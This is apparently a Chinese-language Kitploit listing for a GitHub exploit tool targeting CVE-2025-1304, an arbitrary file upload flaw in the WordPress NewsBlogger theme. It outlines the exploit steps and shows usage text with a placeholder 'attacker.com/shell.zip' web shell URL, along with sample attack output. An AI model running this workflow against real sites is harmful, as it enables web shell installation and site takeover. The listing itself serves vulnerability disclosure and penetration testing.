Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/nxploited/cve-2025-1304
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubnxploited/cve-2025-1304

CVE-2025-1304

WordPress NewsBlogger Theme <= 0.2.5.1 存在任意文件上传漏洞

查看仓库
211年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚨 WordPress NewsBlogger 主题 <= 0.2.5.1 - 任意文件上传 (CVE-2025-1304)

CVSS 评分: 8.8(高危)
漏洞类型: 任意文件上传
组件: WordPress 主题
CVE 编号: CVE-2025-1304


🔥 漏洞概述

WordPress NewsBlogger 主题(版本 <= 0.2.5.1)存在一个通过管理员欢迎面板触发的 任意文件上传 漏洞。

该漏洞允许任何经过身份验证的用户——包括拥有最低 订阅者 角色的用户——上传包含 Web Shell 的恶意 .zip 压缩包。
上传过程通过一个未经验证的插件 URL 字段完成,该字段未能正确验证上传文件的内容或类型。

成功利用此漏洞可能导致网站完全沦陷,包括远程命令执行和权限提升。


🧠 脚本详情

该 Python 脚本通过以下步骤自动化利用该漏洞:

  • 使用提供的管理员凭据登录。
  • 从易受攻击的欢迎页面动态提取 nonce。
  • 通过易受攻击的 AJAX 端点上传远程恶意插件。

⚙️ 使用说明

root@kitploit:~
python CVE-2025-1304.py -h
root@kitploit:~
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB

WordPress NewsBlogger Theme 存在任意文件上传漏洞 #作者: Nxploited ( Khaled Alenazi )

options:
  -h, --help                显示此帮助信息并退出
  --url, -u URL             目标基础 URL(例如 http://target/wordpress)
  --username, -un USERNAME  WordPress 管理员用户名
  --password, -p PASSWORD   WordPress 管理员密码
  --shellweb, -shell SHELLWEB
                           恶意 Shell ZIP 文件的直接 URL(例如 http://attacker.com/shell.zip)

📤 示例输出

root@kitploit:~
[+] 正在登录到 http://target/wordpress/wp-login.php
[+] 登录成功。
[+] 正在获取欢迎页面以提取 nonce:http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] 提取到 nonce:012818100b
[+] 正在向以下地址发送恶意插件 URL:http://target/wordpress/wp-admin/admin-ajax.php
[+] 服务器响应:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}

⚠️ 免责声明

此代码仅用于 教育和授权安全测试 目的。
作者不对该工具的任何滥用或造成的损害承担责任。


作者:Nxploited ( Khaled Alenazi)

下载工具